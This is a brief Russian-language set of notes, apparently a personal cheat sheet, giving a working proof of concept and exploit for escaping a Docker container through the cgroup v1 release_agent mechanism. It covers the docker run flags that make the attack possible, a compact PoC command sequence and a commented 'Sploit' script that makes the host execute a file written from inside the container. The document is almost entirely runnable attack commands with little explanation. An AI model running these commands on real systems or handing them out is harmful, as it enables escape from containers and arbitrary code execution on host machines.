Проверить cgroups 
```bash
mount | grep '^cgroup' | awk '{print $5}' | uniq
```

Зависимости в контейнер
```bash
apt install -y vim # or any other editor
apt install -y ssh
apt install -y gcc
```

Запустить контейнер
```bash
docker run -it --cap-drop=ALL --cap-add=SYS_ADMIN --cap-add=DAC_OVERRIDE --security-opt apparmor=unconfined ubuntu:16.04 bash
```

PoC
```bash
(host)$ docker run -it --rm --privileged ubuntu:latest bash (cont)# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
(cont)# mkdir -p $d/w
(cont)# echo 1 >$d/w/notify_on_release
(cont)# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` 
(cont)# touch /o
(cont)# echo $t/c >$d/release_agent
(cont)# printf '#!/bin/sh\nps >'"$t/o" >/c 
(cont)# chmod +x /c
(cont)# sh -c "echo 0 >$d/w/cgroup.procs" 
(cont)# sleep 1
(cont)# cat /o
```

Sploit
```bash
# create /tmp/cgrp, mount RDMA cgroup controller into it and create child cgroup 
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x 
# Enable the notify_on_release flag
echo 1 > /tmp/cgrp/x/notify_on_release
# Define host_path parameter with the container path on host
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Define path in release_agent which execute when all a cgroup tasks are done.
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
```